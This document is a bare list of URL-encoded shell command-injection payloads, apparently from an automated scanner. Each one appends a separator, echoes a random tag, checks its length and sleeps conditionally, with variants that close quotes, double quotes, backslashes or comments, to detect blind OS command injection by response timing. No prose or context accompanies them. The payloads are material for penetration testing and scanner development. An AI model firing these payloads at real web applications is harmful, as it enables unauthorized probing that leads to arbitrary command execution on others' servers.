+%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%7C%20%5B%201%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%202%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%203%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%204%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%205%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%206%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%207%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%208%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%7C%20%5B%209%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%7C%20%5B%201%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%202%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%203%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%204%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%205%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%206%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%207%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%208%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%7C%20%5B%209%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%7C%20%5B%201%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%202%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%203%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%204%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%205%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%206%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%207%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%208%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%7C%20%5B%209%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%7C%20%5B%201%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%202%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%203%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%204%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%205%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%206%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%207%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%208%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%7C%20%5B%209%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F 